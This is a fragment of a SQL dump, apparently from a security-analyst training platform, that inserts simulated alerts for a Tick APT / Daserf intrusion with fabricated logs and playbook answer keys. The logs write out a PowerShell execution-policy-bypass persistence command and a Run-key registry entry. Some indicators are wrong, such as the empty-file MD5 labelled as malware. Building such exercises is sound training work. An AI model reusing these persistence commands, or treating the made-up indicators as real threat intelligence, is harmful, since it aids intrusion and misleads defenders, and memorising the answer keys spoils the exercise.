detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:45:27Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"3d2e4b9d5f6a7c8e9f0a1b2c3d4e5f6a7b8c9d0e\\\",\\\"action\\\":\\\"blocked\\\",\\\"message\\\":\\\"DLP detected and blocked an attempt to exfiltrate sensitive data to an external IP address.\\\",\\\"threat_actor\\\":\\\"APT41\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.852Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:45:27Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"3d2e4b9d5f6a7c8e9f0a1b2c3d4e5f6a7b8c9d0e\\\",\\\"action\\\":\\\"blocked\\\",\\\"message\\\":\\\"DLP detected and blocked an attempt to exfiltrate sensitive data to an external IP address.\\\",\\\"threat_actor\\\":\\\"APT41\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.852Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:45:27Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"3d2e4b9d5f6a7c8e9f0a1b2c3d4e5f6a7b8c9d0e\\\",\\\"action\\\":\\\"blocked\\\",\\\"message\\\":\\\"DLP detected and blocked an attempt to exfiltrate sensitive data to an external IP address.\\\",\\\"threat_actor\\\":\\\"APT41\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.852Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:45:27Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"3d2e4b9d5f6a7c8e9f0a1b2c3d4e5f6a7b8c9d0e\\\",\\\"action\\\":\\\"blocked\\\",\\\"message\\\":\\\"DLP detected and blocked an attempt to exfiltrate sensitive data to an external IP address.\\\",\\\"threat_actor\\\":\\\"APT41\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.852Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:45:27Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"3d2e4b9d5f6a7c8e9f0a1b2c3d4e5f6a7b8c9d0e\\\",\\\"action\\\":\\\"blocked\\\",\\\"message\\\":\\\"DLP detected and blocked an attempt to exfiltrate sensitive data to an external IP 
address.\\\",\\\"threat_actor\\\":\\\"APT41\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1131, 'Suspicious Email with Daserf Payload', 'high', 'Email Gateway Logs', 'An employee received a phishing email containing a malicious attachment \'invoice_2023.docx\' which is designed to install the Daserf backdoor. This marks the initial access attempt by Tick APT.', 'Phishing', 'T1566.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-01T09:22:15Z\",\"email_id\":\"abc123xyz\",\"from\":\"attacker@example.com\",\"to\":\"employee@company.com\",\"subject\":\"Urgent: Invoice Attached\",\"attachment\":\"invoice_2023.docx\",\"attachment_hash\":\"f1e2d3c4b5a67890123456789abcdef123456789abcdef123456789abcdef1234\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.100\",\"user\":\"jdoe\",\"malware_family\":\"Daserf\"}', '2026-02-01 14:01:53', '2026-02-23 20:13:32', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"attacker@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Known phishing source, linked to previous campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple APT campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"f1e2d3c4b5a67890123456789abcdef123456789abcdef123456789abcdef1234\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Registry\",\"verdict\":\"malicious\",\"details\":\"Hash identified as Daserf backdoor.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"invoice_2023.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename commonly used in phishing attempts.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal 
Directory\",\"verdict\":\"internal\",\"details\":\"Employee of the company.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email with Daserf Payload\",\"date\":\"2026-02-01T20:32:22.854Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1132, 'Execution of Daserf Backdoor', 'high', 'Endpoint Detection and Response (EDR)', 'The Daserf backdoor was executed on the target system, allowing attackers to establish control and prepare for further actions. This is a known APT tactic used to maintain persistence and facilitate further compromise.', 'Malware Execution', 'T1203: Exploitation for Client Execution', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"event_id\":\"EDR-045672\",\"source_ip\":\"204.152.201.7\",\"destination_ip\":\"192.168.1.25\",\"username\":\"jdoe\",\"filename\":\"daserf.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"process_id\":1345,\"process_name\":\"daserf.exe\",\"action\":\"execution\",\"status\":\"success\",\"malware_family\":\"Daserf\"}', '2026-02-01 14:01:53', '2026-02-23 20:14:46', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"204.152.201.7\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"This IP is associated with known APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of affected endpoint.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"daserf.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Associated with Daserf backdoor.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash matches known malicious sample.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"User account on the affected 
system.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1133, 'Establishing Persistence Mechanisms', 'medium', 'Registry and Scheduled Tasks Logs', 'Tick APT employs persistence techniques, modifying registry entries and creating scheduled tasks to ensure continued access to the compromised system. The attacker created a new scheduled task and modified a registry entry to maintain access.', 'Persistence', 'T1053 - Scheduled Task/Job', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:33Z\",\"event_id\":4698,\"task_name\":\"\\\\Microsoft\\\\Windows\\\\Update\\\\CriticalUpdate\",\"task_content\":{\"author\":\"SYSTEM\",\"schedule\":\"Daily\",\"time\":\"02:00\",\"action_type\":\"Start a Program\",\"program\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"arguments\":\"/c powershell.exe -ExecutionPolicy Bypass -File C:\\\\Scripts\\\\maintain_access.ps1\"},\"registry_modification\":{\"key_path\":\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"value_name\":\"UpdateService\",\"value_type\":\"REG_SZ\",\"value_data\":\"C:\\\\ProgramData\\\\UpdateService.exe\"},\"src_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.105\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user\":\"admin_user\"}', '2026-02-01 14:01:53', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known Tick APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network IP.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash recognized as a malicious file related to persistence 
mechanisms.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.857Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:33Z\\\",\\\"event_id\\\":4698,\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\CriticalUpdate\\\",\\\"task_content\\\":{\\\"author\\\":\\\"SYSTEM\\\",\\\"schedule\\\":\\\"Daily\\\",\\\"time\\\":\\\"02:00\\\",\\\"action_type\\\":\\\"Start a Program\\\",\\\"program\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"arguments\\\":\\\"/c powershell.exe -ExecutionPolicy Bypass -File C:\\\\\\\\Scripts\\\\\\\\maintain_access.ps1\\\"},\\\"registry_modification\\\":{\\\"key_path\\\":\\\"HKLM\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"UpdateService\\\",\\\"value_type\\\":\\\"REG_SZ\\\",\\\"value_data\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\UpdateService.exe\\\"},\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"admin_user\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.857Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:33Z\\\",\\\"event_id\\\":4698,\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\CriticalUpdate\\\",\\\"task_content\\\":{\\\"author\\\":\\\"SYSTEM\\\",\\\"schedule\\\":\\\"Daily\\\",\\\"time\\\":\\\"02:00\\\",\\\"action_type\\\":\\\"Start a Program\\\",\\\"program\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"arguments\\\":\\\"/c powershell.exe -ExecutionPolicy Bypass -File C:\\\\\\\\Scripts\\\\\\\\maintain_access.ps1\\\"},\\\"registry_modification\\\":{\\\"key_path\\\":\\\"HKLM\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"UpdateService\\\",\\\"value_type\\\":\\\"REG_SZ\\\",\\\"value_data\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\UpdateService.exe\\\"},\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"admin_user\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.857Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:33Z\\\",\\\"event_id\\\":4698,\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\CriticalUpdate\\\",\\\"task_content\\\":{\\\"author\\\":\\\"SYSTEM\\\",\\\"schedule\\\":\\\"Daily\\\",\\\"time\\\":\\\"02:00\\\",\\\"action_type\\\":\\\"Start a Program\\\",\\\"program\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"arguments\\\":\\\"/c powershell.exe -ExecutionPolicy Bypass -File 
C:\\\\\\\\Scripts\\\\\\\\maintain_access.ps1\\\"},\\\"registry_modification\\\":{\\\"key_path\\\":\\\"HKLM\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"UpdateService\\\",\\\"value_type\\\":\\\"REG_SZ\\\",\\\"value_data\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\UpdateService.exe\\\"},\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"admin_user\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.857Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:33Z\\\",\\\"event_id\\\":4698,\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\CriticalUpdate\\\",\\\"task_content\\\":{\\\"author\\\":\\\"SYSTEM\\\",\\\"schedule\\\":\\\"Daily\\\",\\\"time\\\":\\\"02:00\\\",\\\"action_type\\\":\\\"Start a Program\\\",\\\"program\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"arguments\\\":\\\"/c powershell.exe -ExecutionPolicy Bypass -File C:\\\\\\\\Scripts\\\\\\\\maintain_access.ps1\\\"},\\\"registry_modification\\\":{\\\"key_path\\\":\\\"HKLM\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"UpdateService\\\",\\\"value_type\\\":\\\"REG_SZ\\\",\\\"value_data\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\UpdateService.exe\\\"},\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"admin_user\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.857Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:33Z\\\",\\\"event_id\\\":4698,\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\CriticalUpdate\\\",\\\"task_content\\\":{\\\"author\\\":\\\"SYSTEM\\\",\\\"schedule\\\":\\\"Daily\\\",\\\"time\\\":\\\"02:00\\\",\\\"action_type\\\":\\\"Start a Program\\\",\\\"program\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"arguments\\\":\\\"/c powershell.exe -ExecutionPolicy Bypass -File C:\\\\\\\\Scripts\\\\\\\\maintain_access.ps1\\\"},\\\"registry_modification\\\":{\\\"key_path\\\":\\\"HKLM\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"UpdateService\\\",\\\"value_type\\\":\\\"REG_SZ\\\",\\\"value_data\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\UpdateService.exe\\\"},\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"admin_user\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1134, 'Lateral Movement within Network', 'high', 'Network Traffic Analysis', 'The Daserf backdoor was used to move laterally within the network from compromised host 192.168.1.15 to target host 192.168.1.25. The attacker established a connection from external IP 203.0.113.45, executing the malicious payload identified by hash d41d8cd98f00b204e9800998ecf8427e. The attacker aims to expand their network foothold by accessing additional systems.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:09Z\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"192.168.1.25\",\"external_ip\":\"203.0.113.45\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"event_type\":\"lateral_movement\",\"malware_name\":\"Daserf\",\"user\":\"attacker_user\",\"filename\":\"payload.exe\"}', '2026-02-01 14:01:53', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Source host within the organization.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Target host within the organization.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"External Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with prior attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to Daserf backdoor payload.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1135, 'Data Exfiltration Detected', 'critical', 'Data Loss Prevention (DLP) Systems', 'Sensitive data related to defense and aerospace technologies is being exfiltrated by the Tick APT group. Anomalous data transfers to an external IP have been detected, indicating potential data theft.', 'Data Exfiltration', 'T1020 (Data Transfer Size Limits)', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-20T14:05:32Z\",\"event_id\":\"DLP123456\",\"source_ip\":\"192.168.1.25\",\"destination_ip\":\"203.0.113.45\",\"user\":\"jdoe\",\"file_name\":\"classified_defense_project_v2.pdf\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"protocol\":\"HTTPS\",\"action\":\"allowed\",\"bytes_transferred\":10485760,\"dlp_policy\":\"Sensitive Data Movement\",\"dlp_rule\":\"Defense & Aerospace Keywords\"}', '2026-02-01 14:01:53', '2026-02-16 17:49:30', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external_ip_database\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with cyber espionage activities.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"classified_defense_project_v2.pdf\",\"is_critical\":false,\"osint_result\":{\"source\":\"file_reputation_service\",\"verdict\":\"suspicious\",\"details\":\"Contains classified keywords related to defense and aerospace.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"malware_hash_registry\",\"verdict\":\"clean\",\"details\":\"No known malware associated with this hash, but involved in suspicious 
activity.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_user_database\",\"verdict\":\"internal\",\"details\":\"Employee associated with the compromised host.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.860Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:05:32Z\\\",\\\"event_id\\\":\\\"DLP123456\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"classified_defense_project_v2.pdf\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"bytes_transferred\\\":10485760,\\\"dlp_policy\\\":\\\"Sensitive Data Movement\\\",\\\"dlp_rule\\\":\\\"Defense & Aerospace Keywords\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.860Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:05:32Z\\\",\\\"event_id\\\":\\\"DLP123456\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"classified_defense_project_v2.pdf\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"bytes_transferred\\\":10485760,\\\"dlp_policy\\\":\\\"Sensitive Data 
Movement\\\",\\\"dlp_rule\\\":\\\"Defense & Aerospace Keywords\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.860Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:05:32Z\\\",\\\"event_id\\\":\\\"DLP123456\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"classified_defense_project_v2.pdf\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"bytes_transferred\\\":10485760,\\\"dlp_policy\\\":\\\"Sensitive Data Movement\\\",\\\"dlp_rule\\\":\\\"Defense & Aerospace Keywords\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.860Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 